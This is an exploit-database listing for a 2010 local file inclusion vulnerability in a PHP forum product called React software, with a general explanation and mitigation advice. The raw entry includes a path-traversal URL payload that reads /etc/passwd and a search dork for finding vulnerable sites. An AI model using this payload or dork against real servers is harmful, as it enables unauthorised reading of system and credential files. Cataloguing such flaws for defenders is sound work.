header-logo
Suggest Exploit
vendor:
React software
by:
SNK
7,5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: React software
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: php
2010

React software [local file inclusion]

This vulnerability allows an attacker to include a file, usually exploiting a “dynamic file inclusion” mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to the attacker including arbitrary local files from the target server, which may contain sensitive information such as configuration files, passwords, etc.

Mitigation:

Input validation should be used to prevent the inclusion of arbitrary files. The application should also be configured to prevent the execution of arbitrary files.
Source

Exploit-DB raw data:

React software [local file inclusion]

- date: 29.03.2010

- author: SNK
- language: php
- page: http://react.nl
- vuln: http://page/forum/list_message/index.php?action=../../../../../../../../../../../../../etc/passwd%00
- dork: Powered by React - www.react.nl

Navigation

Suggest Exploit

Services By CQR